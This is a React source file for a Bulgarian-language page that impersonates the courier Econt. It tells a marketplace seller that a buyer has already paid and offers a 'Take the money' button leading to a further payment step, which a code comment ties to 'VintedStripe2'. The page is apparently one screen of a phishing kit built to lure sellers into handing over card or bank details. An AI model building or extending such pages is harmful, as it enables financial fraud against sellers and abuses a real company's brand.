import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './EcontBgSuccess.css';
import SupportWidget from './SupportWidget';
import BgMarketplaceDecoRow from './BgMarketplaceDecoRow';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const ECONT_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/econt-logo.png`;
const BG_ORDER_PAID_BANNER_SRC = `${process.env.PUBLIC_URL || ''}/bg-order-paid-banner.png`;

function ShieldCheckIcon() {
  return (
    <svg width="24" height="24" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 2L4 5v6.09c0 5.05 3.41 9.76 8 10.91 4.59-1.15 8-5.86 8-10.91V5l-8-3z"
        fill="#00a651"
      />
      <path
        d="M10.5 14.2L8.3 12l-1.1 1.1 3.3 3.3 6.6-6.6-1.1-1.1-5.5 5.5z"
        fill="#fff"
      />
    </svg>
  );
}

/**
 * Econt (BG) — след капча; бутон към index2 (VintedStripe2).
 */
function EcontBgSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BG').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="econt-bg-wrap">
        <div className="econt-bg-topbar">
          <div className="econt-bg-topbar-inner">
            <span className="econt-bg-logo" aria-hidden>
              <img src={ECONT_LOGO_SRC} alt="" className="econt-bg-logo-img" width={120} height={32} />
            </span>
          </div>
        </div>
        <div className="econt-bg-loading">Зареждане…</div>
        <div className="econt-bg-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="econt-bg-wrap">
      <header className="econt-bg-topbar">
        <div className="econt-bg-topbar-inner">
          <a href="#/" className="econt-bg-logo" aria-label="Econt">
            <img src={ECONT_LOGO_SRC} alt="Еконт" className="econt-bg-logo-img" width={120} height={32} />
          </a>
        </div>
      </header>

      <main className="econt-bg-main">
        <div className="econt-bg-layout">
          <div className="econt-bg-col-left">
            <h1 className="econt-bg-page-title">Получаване на плащане от купувача</h1>

            <div className="econt-bg-item-card">
              <div className="econt-bg-item-thumb">
                {photoUrl ? (
                  <img src={photoUrl} alt="" />
                ) : (
                  <div className="econt-bg-thumb-placeholder" aria-hidden />
                )}
              </div>
              <div className="econt-bg-item-meta">
                <p className="econt-bg-item-price">
                  {priceText} EUR
                </p>
                <p className="econt-bg-item-name">{productTitle}</p>
              </div>
            </div>

            <div className="econt-bg-success-banner-wrap">
              <img
                src={BG_ORDER_PAID_BANNER_SRC}
                alt="Вашият артикул е издаден! Купувачът вече е платил за поръчката."
                className="econt-bg-success-banner-img"
              />
            </div>

            <BgMarketplaceDecoRow wrapClass="econt-bg-deco-row" imgClass="econt-bg-deco-img" />

            <section className="econt-bg-delivery" aria-labelledby="econt-delivery-h">
              <h2 id="econt-delivery-h" className="econt-bg-delivery-heading">
                Подробности за доставката
              </h2>
              <div className="econt-bg-field">
                <span className="econt-bg-field-label">Адрес за доставка</span>
                <span className="econt-bg-field-line">{address}</span>
              </div>
              <div className="econt-bg-name-grid">
                <div className="econt-bg-field">
                  <span className="econt-bg-field-label">Фамилия</span>
                  <span className="econt-bg-field-line">{ln || '—'}</span>
                </div>
                <div className="econt-bg-field">
                  <span className="econt-bg-field-label">Първо име</span>
                  <span className="econt-bg-field-line">{fn || '—'}</span>
                </div>
              </div>
            </section>

            <div className="econt-bg-instructions">
              <p>
                След получаване на средствата, моля, изпратете стоките на купувача според дадените данни или предайте
                стоките на куриера, който ще ви се обади в рамките на 12 часа.
              </p>
              <p>
                След изпращането на стоките, моля, посочете на купувача номер на доставката! Стоките трябва да бъдат
                изпратени в рамките на 3 дни след получаване на средствата.
              </p>
            </div>
          </div>

          <aside className="econt-bg-aside" aria-label="Действие">
            <div className="econt-bg-aside-card">
              <p className="econt-bg-aside-price">{priceText} EUR</p>
              <Link to={index2Path} className="econt-bg-aside-btn">
                Вземи парите
              </Link>
              <div className="econt-bg-secure-row">
                <ShieldCheckIcon />
                <span className="econt-bg-secure-text">Получаването на плащане е сигурно</span>
              </div>
              <p className="econt-bg-aside-legal">
                С натискането на бутона &quot;Вземи парите&quot; се съгласявате с условията на Споразумението с
                потребителя, като използвате онлайн услугата &quot;Сигурна оферта&quot;.
              </p>
            </div>
          </aside>
        </div>
      </main>

      <div className="econt-bg-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default EcontBgSuccess;
